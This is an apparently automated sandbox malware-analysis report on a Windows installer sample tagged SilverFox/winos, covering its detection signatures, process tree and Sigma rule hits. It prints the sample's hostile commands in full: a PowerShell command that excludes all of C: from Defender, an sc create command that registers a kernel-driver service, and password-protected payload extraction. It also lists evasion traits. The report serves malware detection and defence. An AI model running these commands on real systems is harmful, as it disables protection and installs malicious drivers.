Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe

Overview

General Information

Sample name:#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
renamed because original name is a hash value
Original sample name:_1.0.4.exe
Analysis ID:1579419
MD5:44728e21199d2b04a4b25798625ac86e
SHA1:382e29a97bb8a34a3164f7464692f16e3526bb1c
SHA256:4cd9b5ec751ac76c5e71d500cd4592dbd4fc7ce4e88ea0187fbc04e66f976cc5
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe (PID: 6700 cmdline: "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" MD5: 44728E21199D2B04A4B25798625AC86E)
    • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp (PID: 6768 cmdline: "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
      • powershell.exe (PID: 2312 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7080 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT MD5: 44728E21199D2B04A4B25798625AC86E)
        • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp (PID: 1068 cmdline: "C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043C,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT MD5: CCFB5265302C0ED10D4EE3C9C00B07B1)
          • 7zr.exe (PID: 6024 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 1440 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1440 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 5260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • cmd.exe (PID: 6024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 6024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 5928 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3496 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6792 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2212 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4604 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1516 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3496 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6792 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 5172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 3220 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2160 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6168 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5476 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3496 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1516 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6504 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6792 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2736 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4604 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2160 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2672 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2736 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6700 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5260 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6744 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1236 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4428 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2996 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6744 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6772 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6792 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1136 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2736 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2720 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6768 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1136 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3220 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1216 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4476 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2284 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2124 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6792 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2680 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5856 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6044 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4020 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4080 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5688 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2720 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1712 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2672 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5172 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2916 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2792 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3736 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 6768, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2312, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5928, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3496, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 6768, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2312, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5928, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3496, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ParentProcessId: 6768, ParentProcessName: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2312, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 83.3% probability
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1892309126.0000000003110000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1892434905.0000000003310000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA098B0 FindFirstFileA,FindClose,FindClose,6_2_6CA098B0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00186868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_00186868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00187496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_00187496
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
